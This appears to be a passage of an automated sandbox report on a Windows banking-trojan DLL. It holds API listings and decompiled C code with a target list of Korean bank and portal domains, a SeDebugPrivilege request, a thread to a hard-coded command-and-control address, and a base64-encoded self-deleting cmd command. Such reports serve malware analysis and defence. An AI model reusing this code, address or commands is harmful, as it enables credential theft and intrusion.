30b14a4 VirtualProtect 355 30b14df 354->355 356 30b14e3 VirtualProtect 354->356 355->356

            Callgraph

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,ABAD1000,00001000,00000040,030B1600,?,?,?,?), ref: 030B0D5C
            • wsprintfA.USER32(?,?,?,?), ref: 030B0E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 030B0E18
            • ExitProcess.KERNEL32(00000000), ref: 030B0E20
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd
            Similarity
            • API ID: AllocExitMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 1926473177-4208015514
            • Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction ID: ec36d31ef7f9ba4542863cf35e413820390993ef5a93c94c95cfe65b892c6393
            • Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction Fuzzy Hash: 3C416A362427069FEB38DF14CC84BEB73B5EF84351F044619EE56AB684EB70B8108B90
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • wsprintfA.USER32(?,?,?,?), ref: 030B0E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 030B0E18
            • ExitProcess.KERNEL32(00000000), ref: 030B0E20
            • VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 030B0E69
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd
            Similarity
            • API ID: ExitFreeMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 789587083-4208015514
            • Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction ID: c56e382423d9a024aee3f23a2878fe9272b7b1cf0e8de93b32a1e0022680ae73
            • Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction Fuzzy Hash: 9831BE362463869FEB39CF10CC94FEB77B8AF45254F080159ED568B285EF30A414CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 58 30b14a4-30b14dd VirtualProtect 59 30b14df-30b14e1 58->59 60 30b14e3-30b14fb VirtualProtect 58->60 59->60
            APIs
            • VirtualProtect.KERNELBASE(?,00001000,00000004,?,?), ref: 030B14D3
            • VirtualProtect.KERNELBASE(?,00001000,?,?), ref: 030B14F1
            Memory Dump Source
            • Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction ID: 330c60cf30274680802b404af0cfe9fa6d0429198abb81237553a04804aba2e2
            • Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction Fuzzy Hash: 0CF0E933240245AFEB1D8FA4D895EEE7768DF48398B20016AF6029A586CA71E651C754
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 61 30b0063-30b0069 63 30b006b-30b0082 VirtualAlloc 61->63 64 30b00c3-30b00c5 61->64 63->64 66 30b0084-30b00a4 63->66 65 30b00c6-30b00ca 64->65 67 30b00aa-30b00b0 66->67 68 30b00a5 call 30b00cd 66->68 69 30b00b2-30b00b4 67->69 70 30b00b5-30b00c1 VirtualFree 67->70 68->67 69->70 70->65
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 030B007E
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 030B00BE
            Memory Dump Source
            • Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction ID: 0c65109a8f6b77a2514677ca00643d3c0896abb5b8aa3064cf9fed470a484c08
            • Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction Fuzzy Hash: C601A47621A7027EF7718AA19C00F77BBECDF48612F184C5AFAD5C5090DA25E4408B70
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 71 30b002a-30b002e 73 30b00c3-30b00c5 71->73 74 30b0034-30b0043 call 30b0047 71->74 75 30b00c6-30b00ca 73->75 78 30b00aa-30b00b0 74->78 79 30b0045-30b0061 call 30b0063 74->79 81 30b00b2-30b00b4 78->81 82 30b00b5-30b00c1 VirtualFree 78->82 79->78 81->82 82->75
            APIs
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 030B00BE
            Memory Dump Source
            • Source File: 00000005.00000002.252806727.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_30b0000_rundll32.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction ID: c4f09e107145750557cd88906cbcc8a71b21535eef00d3f318f20e8c6292cf11
            • Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction Fuzzy Hash: EEF0E92266B3116DF620E7347C44AA7BBB8EB42221F150E97DD40D6091DE11D80286A4
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:1.9%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:20
            Total number of Limit Nodes:2
            execution_graph 16363 4830063 16364 4830067 16363->16364 16365 483006b VirtualAlloc 16364->16365 16366 48300c3 16364->16366 16365->16366 16367 4830084 16365->16367 16368 48300b5 VirtualFree 16367->16368 16368->16366 16372 4830cb1 16374 4830cdd 16372->16374 16375 4830d0d 16374->16375 16376 4830d3b VirtualAlloc 16375->16376 16378 4830d6a 16376->16378 16377 4830e0c MessageBoxA ExitProcess 16378->16377 16379 4830e26 16378->16379 16380 4830dab 16378->16380 16381 4830e54 VirtualFree 16379->16381 16382 4830dbb wsprintfA 16380->16382 16384 4830dcb 16380->16384 16382->16384 16384->16377 16369 48314a4 VirtualProtect 16370 48314e3 VirtualProtect 16369->16370 16371 48314df 16369->16371 16371->16370

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,04831600,?,?,?,?), ref: 04830D5C
            • wsprintfA.USER32(?,?,?,?), ref: 04830E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 04830E18
            • ExitProcess.KERNEL32(00000000), ref: 04830E20
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd
            Similarity
            • API ID: AllocExitMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 1926473177-4208015514
            • Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction ID: d2ffbc11ebc567067e9f6d5294d8b74cc62c7761470f6b32cbd49571dff4ab4b
            • Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
            • Instruction Fuzzy Hash: 5D418E3264170A9FEB34DF18CC84FEB73A5AF45756F044618ED4697649EB70B8108B91
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • wsprintfA.USER32(?,?,?,?), ref: 04830E00
            • MessageBoxA.USER32(00000000,?,?,00000010), ref: 04830E18
            • ExitProcess.KERNEL32(00000000), ref: 04830E20
            • VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 04830E69
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd
            Similarity
            • API ID: ExitFreeMessageProcessVirtualwsprintf
            • String ID: SWVU$The procedure %s could not be located in the DLL %s.
            • API String ID: 789587083-4208015514
            • Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction ID: a4da2b924ad042dff14586c1f5c67b66ca41bf3552c1488c1f05237b357ddaf2
            • Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
            • Instruction Fuzzy Hash: 9131CF3260534A9FEB399F14CC84FEB77A8AF46356F040619ED42C7289EB30B410CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 114 48314a4-48314dd VirtualProtect 115 48314e3-48314fb VirtualProtect 114->115 116 48314df-48314e1 114->116 116->115
            APIs
            • VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 048314D3
            • VirtualProtect.KERNEL32(?,00001000,?,?), ref: 048314F1
            Memory Dump Source
            • Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction ID: 3fe6049c16b5b2982c1eee51ff601989f5fd221399f47aa146204e27cf95f26e
            • Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction Fuzzy Hash: 1CF0E933240245AFEB198FA4D885EEE7768DF48398B20056AF6029A186CA71E551C754
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 117 4830063-4830069 119 48300c3-48300c5 117->119 120 483006b-4830082 VirtualAlloc 117->120 121 48300c6-48300ca 119->121 120->119 122 4830084-48300a4 120->122 123 48300aa-48300b0 122->123 124 48300a5 call 48300cd 122->124 125 48300b2-48300b4 123->125 126 48300b5-48300c1 VirtualFree 123->126 124->123 125->126 126->121
            APIs
            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0483007E
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 048300BE
            Memory Dump Source
            • Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction ID: 41c2d749e4c54b1b8d3d197351cab71360d168c419536ca0d85305b6dd314b9f
            • Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction Fuzzy Hash: 1601F4722096017EE7319BA19C50F37BBDCDF09316F044C5AFAD5C5090D921F4408BB1
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 195 483002a-483002e 197 48300c3-48300c5 195->197 198 4830034-4830043 call 4830047 195->198 199 48300c6-48300ca 197->199 202 4830045-4830061 call 4830063 198->202 203 48300aa-48300b0 198->203 202->203 205 48300b2-48300b4 203->205 206 48300b5-48300c1 VirtualFree 203->206 205->206 206->199
            APIs
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 048300BE
            Memory Dump Source
            • Source File: 0000000C.00000002.281045163.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_4830000_rundll32.jbxd
            Similarity
            • API ID: FreeVirtual
            • String ID:
            • API String ID: 1263568516-0
            • Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction ID: c0b09dcc072dce1ebefa3c6e220d826b3c38dd760ab2de44487389614695c220
            • Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
            • Instruction Fuzzy Hash: ADF02E2264E3156DF610B7347C64A27BB98DF4332BB150F97DC40D6095DD15E8028AE5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 35%
            			E10005318(void* __ecx, void* __eflags, intOrPtr _a4) {
            				void _v4099;
            				signed char _v4100;
            				signed char* _t20;
            				signed char* _t25;
            				intOrPtr* _t31;
            				signed char* _t32;
            				void* _t33;
            				void* _t35;
            
            				E1000CD20(0x1000, __ecx);
            				_v4100 = _v4100 & 0x00000000;
            				_push("www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.co.ki|www.keb.co.kr.ki|www.kfcc.co.kr.ki|www.lottirich.co.ki|www.nlotto.co.ki|www.gmarket.net|nate.com|www.nate.com|daum.com|www.daum.net|daum.net|www.zum.com|zum.com|naver.com|www.nonghyup.com|www.naver.com||www.nate.net|hanmail.net|www.hanmail.net|www.hanacbs.com|kfcc.co.ki|www.kfcc.co.ki|www.daum.net|daum.net|www.kbstir.com|www.nonghuyp.com|www.wooribank.com|www.ibek.co.ki|www.epostbenk.go.ki|www.hanabenk.com|www.keb.co.ki|www.citibank.co.ki|www.citibank.co.kr.ki|www.standardchartered.co.kr.ki|www.standardchartered.co.ki|www.suhyup-bank.com.ki|www.suhyup-bank.com|www.kjbank.com.ki|www.kjbank.com|openbank.cu.co.kr.ki|openbank.cu.co.ki|www.knbank.co.ki|www.knbank.co.kr.ki|www.busanbank.co.kr.ki|www.busanbank.co.ki|www.suhyup-bank.com|www.suhyup-bank.com.ki|www.standardchartered.co.kr.ki|www.nonghuyp.com.ki|");
            				memset( &_v4099, 0, 0x3ff << 2);
            				asm("stosw");
            				asm("stosb");
            				E1000CD0E(0,  &_v4100);
            				_pop(_t31);
            				0x100411b9();
            				_t25 =  &_v4100;
            				_t20 =  *_t31( &_v4100, 0x7c);
            				_t35 = _t33 + 0x1c;
            				while(1) {
            					_t32 = _t20;
            					if(_t32 == 0) {
            						break;
            					}
            					 *_t32 =  *_t32 & 0x00000000;
            					E1000CD08(0, _a4);
            					E1000CD08(0, _a4);
            					E1000CD08(0, _a4);
            					E1000CD08(0, _a4);
            					_t12 =  &(_t32[1]); // 0x1
            					_t25 = _t12;
            					_t20 =  *_t31(_t25, 0x7c, "\r\n", _t25, "    ", 0x10016ae0);
            					_t35 = _t35 + 0x28;
            				}
            				return _t20;
            			}











            0x10005320
            0x10005325
            0x1000533c
            0x10005341
            0x10005343
            0x10005345
            0x1000534d
            0x10005352
            0x10005353
            0x10005361
            0x10005367
            0x10005369
            0x1000536c
            0x1000536c
            0x10005370
            0x00000000
            0x00000000
            0x10005372
            0x1000537d
            0x1000538a
            0x10005393
            0x100053a0
            0x100053a5
            0x100053a5
            0x100053ab
            0x100053ad
            0x100053ad
            0x100053b6

            APIs
            Strings
            • , xrefs: 10005382
            • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000533C
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
            • API String ID: 2994545307-230412946
            • Opcode ID: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
            • Instruction ID: c97ba9839e98783193aeac5bdf29b258f442598287bfd32f3df003f3fcbf67da
            • Opcode Fuzzy Hash: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
            • Instruction Fuzzy Hash: 8501B53690421D76EB12E768CC41FDE7F58EF482C1F104476F648AA096D7B5BAC45A90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 51%
            			E10008656(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, signed int _a12) {
            				void* _v19;
            				char _v20;
            				void _v1043;
            				char _v1044;
            				char _v1444;
            				void* _v1452;
            				void* __ebx;
            				void* __edi;
            				void* __ebp;
            				void* _t15;
            				CHAR* _t18;
            				signed int _t22;
            				void* _t24;
            				void* _t31;
            				intOrPtr* _t39;
            				void* _t40;
            				void* _t43;
            				void* _t48;
            				void* _t52;
            				void* _t53;
            				void* _t56;
            				intOrPtr _t64;
            				void* _t66;
            
            				_t79 = __fp0;
            				_t63 = __esi;
            				_t55 = __edx;
            				_t15 = E10005989(_t43, __ecx, __edx, _t56, __esi, _t66, __eflags, __fp0);
            				0x100337e0(0, 1, "F896SD5DAE", 0x10015a68);
            				asm("daa");
            				0x1003b59a(_t66);
            				if(_t15 != 0xb7) {
            					_t72 = _t15 - 5;
            					if(_t15 != 5) {
            						E100042A2(0, _t72, __fp0, "SeDebugPrivilege", 1);
            						_t24 = E10005986();
            						0x1004075a(0x100168d4, __esi);
            						_t64 =  *0x1000e094;
            						if(_t24 == 0) {
            							_t39 = E100044AD(_t24, __edx, 0x35);
            							_pop(_t53);
            							if(_t39 != 0xffffffff) {
            								_t39 = E10004351(_t39, _t53, __edx, __fp0, _t39, "123");
            								_pop(_t53);
            							}
            							0x10030e70(0);
            							_t66 = 0x100168d4;
            							asm("adc [esp+edx+0x68], dh");
            							asm("rol byte [edi], 1");
            							 *_t39 =  *_t39 + _t39;
            							Sleep(??);
            							_t2 =  &_a12; // 0x0
            							_push( *_t2);
            							_t40 = L1002E51E(_t39, _t53, _t66);
            							asm("repe call 0xffffbd83");
            							_t76 = _t40;
            							if(_t40 == 0) {
            								CreateThread(0, 0, E10008578, 0, 0, 0);
            							}
            							E10006DD5(0, _t53, _t55, 0x100168d4, _t64, _t76, _t79);
            						}
            						CreateThread(0, 0, E10006EE7, 0, 0, 0);
            						Sleep(0x3e8);
            						_t3 =  &_v1444; // 0x10016334
            						0x10033977(0x202, _t3);
            						CreateThread(0, 0, E10006B30, "107.163.56.251:6658", 0, 0);
            						CreateThread(0, 0, E10008208, 0, 0, 0);
            						Sleep(0xbb8);
            						_v20 = 0;
            						asm("stosd");
            						asm("stosd");
            						asm("stosd");
            						asm("stosw");
            						asm("stosb");
            						_t6 =  &_v20; // 0x100168c4
            						_t31 = E10005ACA(_t76, _t6);
            						_t77 = _t31 - 5;
            						_t52 = _t66;
            						if(_t31 < 5) {
            							CreateThread(0, 0, E10007112, 0, 0, 0);
            						}
            						CreateThread(0, 0, E1000827D, 0, 0, 0);
            						Sleep(0xbb8);
            						CreateThread(0, 0, E1000490F, 0, 0, 0);
            						CreateThread(0, 0, E10006EEF, 0, 0, 0);
            						if(E10004482(_t52, _t77, _t79) == 0) {
            							Sleep(0x927c0);
            							CreateThread(0, 0, 0x10006a7f, 0, 0, 0);
            							Sleep(0x1388);
            							CreateThread(0, 0, E1000842D, 0, 0, 0);
            						}
            						Sleep(0xffffffff);
            						L13:
            						Sleep(0x36ee80);
            						goto L13;
            					}
            				}
            				_v1044 = 0;
            				memset( &_v1043, 0, 0xff << 2);
            				asm("stosw");
            				asm("stosb");
            				_t18 = E10001000(0, __eflags, _t79, "Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=");
            				_t48 = 0x100167d0;
            				wsprintfA( &_v1044, _t18);
            				_push(0);
            				_t22 = E100255A5(0, _t48,  &_v1043 + 0xff, _t63, _t66, _t55,  &_v1044);
            				__eflags = _a12;
            				if(_a12 != 0) {
            					Sleep(0x7d0);
            					0x10041059(_a12);
            					__eflags = _t22 & 0xc3c95b5f;
            					return _t22;
            				}
            				return _t22;
            			}


























            0x10008656
            0x10008656
            0x10008656
            0x10008661
            0x1000867b
            0x10008680
            0x10008682
            0x1000868c
            0x10008692
            0x10008695
            0x100086a3
            0x100086aa
            0x100086b5
            0x100086bb
            0x100086c3
            0x100086c7
            0x100086cf
            0x100086d0
            0x100086d8
            0x100086de
            0x100086de
            0x100086e1
            0x100086e8
            0x100086e9
            0x100086ed
            0x100086ef
            0x100086f1
            0x100086f7
            0x100086f7
            0x100086fa
            0x100086ff
            0x10008705
            0x10008707
            0x10008713
            0x10008713
            0x10008715
            0x10008715
            0x10008724
            0x10008731
            0x10008733
            0x10008740
            0x10008753
            0x1000875f
            0x10008766
            0x1000876d
            0x10008770
            0x10008771
            0x10008772
            0x10008773
            0x10008775
            0x10008776
            0x1000877a
            0x1000877f
            0x10008782
            0x10008783
            0x1000878f
            0x1000878f
            0x1000879b
            0x100087a8
            0x100087b4
            0x100087c0
            0x100087cf
            0x100087d6
            0x100087e2
            0x100087e9
            0x100087f5
            0x100087f5
            0x100087f9
            0x100087fc
            0x10008801
            0x00000000
            0x10008801
            0x10008695
            0x10008812
            0x10008818
            0x1000881a
            0x10008826
            0x10008827
            0x1000882c
            0x10008835
            0x10008844
            0x10008847
            0x1000884c
            0x1000884f
            0x10008856
            0x1000885f
            0x10008864
            0x00000000
            0x10008864
            0x10008868

            APIs
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 100059AE
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 100059FB
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A08
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A19
            • Sleep.KERNEL32(00000000,100168D4,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100086F1
            • CreateThread.KERNEL32(00000000,00000000,10008578,00000000,00000000,00000000), ref: 10008713
            • CreateThread.KERNEL32(00000000,00000000,10006EE7,00000000,00000000,00000000), ref: 10008724
            • Sleep.KERNEL32(000003E8,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008731
            • CreateThread.KERNEL32(00000000,00000000,10006B30,107.163.56.251:6658,00000000,00000000), ref: 10008753
            • CreateThread.KERNEL32(00000000,00000000,10008208,00000000,00000000,00000000), ref: 1000875F
            • Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008766
            • CreateThread.KERNEL32(00000000,00000000,10007112,00000000,00000000,00000000), ref: 1000878F
            • CreateThread.KERNEL32(00000000,00000000,1000827D,00000000,00000000,00000000), ref: 1000879B
            • Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087A8
            • CreateThread.KERNEL32(00000000,00000000,1000490F,00000000,00000000,00000000), ref: 100087B4
            • CreateThread.KERNEL32(00000000,00000000,10006EEF,00000000,00000000,00000000), ref: 100087C0
            • Sleep.KERNEL32(000927C0,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087D6
            • CreateThread.KERNEL32(00000000,00000000,10006A7F,00000000,00000000,00000000), ref: 100087E2
            • Sleep.KERNEL32(00001388,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087E9
            • CreateThread.KERNEL32(00000000,00000000,1000842D,00000000,00000000,00000000), ref: 100087F5
            • Sleep.KERNEL32(000000FF,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087F9
            • Sleep.KERNEL32(0036EE80,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008801
            • wsprintfA.USER32 ref: 10008835
            • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008856
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateThread$Sleep$wsprintf
            • String ID: 107.163.56.251:6658$123$F896SD5DAE$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
            • API String ID: 2554219641-707305509
            • Opcode ID: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
            • Instruction ID: 562cb21c62d1d749736fc9fe061952e86694a01f598b035fd930608b54173050
            • Opcode Fuzzy Hash: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
            • Instruction Fuzzy Hash: 8B51BEE150435CBEF710E7788CC5EBB3A9CEF442D9F11092AF255A508ADFB4AD408A76
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 40%
            			E100053B7(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
            				intOrPtr _v8;
            				void _v71;
            				char _v72;
            				void _v331;
            				char _v332;
            				void _v591;
            				char _v592;
            				void _v851;
            				char _v852;
            				void _v4947;
            				signed char _v4948;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				int _t82;
            				int _t86;
            				int _t88;
            				CHAR* _t104;
            				void* _t118;
            				signed int _t120;
            				signed int _t122;
            				signed int _t124;
            				signed int _t126;
            				signed int _t128;
            				signed int _t130;
            				CHAR* _t132;
            				CHAR* _t136;
            				CHAR* _t138;
            				intOrPtr _t142;
            				signed int _t147;
            				signed int _t151;
            				void* _t155;
            				void* _t157;
            				signed int _t158;
            				signed int _t162;
            				signed int _t163;
            				signed int _t164;
            				signed int _t165;
            				signed int _t166;
            				signed int _t167;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				int _t183;
            				intOrPtr _t186;
            				void* _t198;
            				void* _t199;
            				void* _t202;
            				intOrPtr _t204;
            				void* _t205;
            				void* _t206;
            				signed int _t216;
            				void* _t220;
            
            				_t220 = __fp0;
            				_t170 = __edx;
            				_t144 = __ecx;
            				E1000CD20(0x1350, __ecx);
            				if(_a12 != 0) {
            					_t82 =  *0x10015fb8; // 0x0
            					_t202 =  *((intOrPtr*)(_a8 + 0xc)) - _t82;
            					_t183 = 0;
            					__eflags = 0;
            					do {
            						_push(_t82 + 0xfffffffe);
            						_push(_a4 + _t183);
            						_push( *0x10015fc8);
            						_t86 = E1000CDA6(_a4 + _t183, _t144, _t170, __eflags);
            						_t206 = _t206 + 0xc;
            						__eflags = _t86;
            						_t82 =  *0x10015fb8; // 0x0
            						if(_t86 == 0) {
